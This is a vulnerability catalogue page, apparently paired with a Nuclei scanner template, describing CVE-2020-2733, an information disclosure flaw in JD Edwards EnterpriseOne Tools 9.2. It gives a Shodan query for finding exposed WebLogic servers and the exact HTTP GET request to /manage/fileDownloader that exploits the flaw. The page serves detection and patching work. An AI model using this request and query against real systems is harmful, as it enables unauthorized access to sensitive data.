🔙 목록으로 돌아가기

CVE-2020-2733: JD Edwards EnterpriseOne Tools 9.2 - Information Disclosure

TitleJD Edwards EnterpriseOne Tools 9.2 - Information Disclosure
AuthorDhiyaneshDk,pussycat0x
SeverityCritical
ImpactSuccessful exploitation of this vulnerability could lead to unauthorized access to sensitive information.
RemediationApply the latest security patches or updates provided by the vendor to mitigate this vulnerability.
CVSS Score9.8
EPSS Score0.88882
CVE IDCVE-2020-2733
Shodan Queryport:8999 product:"Oracle WebLogic Server"port:8999 product:"oracle weblogic server"
Tags cve2020 cve oracle weblogic disclosure exposure vuln

🔍 Vulnerability Description

JD Edwards EnterpriseOne Tools 9.2 is susceptible to information disclosure via the Monitoring and Diagnostics component. An attacker with network access via HTTP can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.

🌐 HTTP Request

GET /manage/fileDownloader?sec=1 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6,2 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-2733.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-2733.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A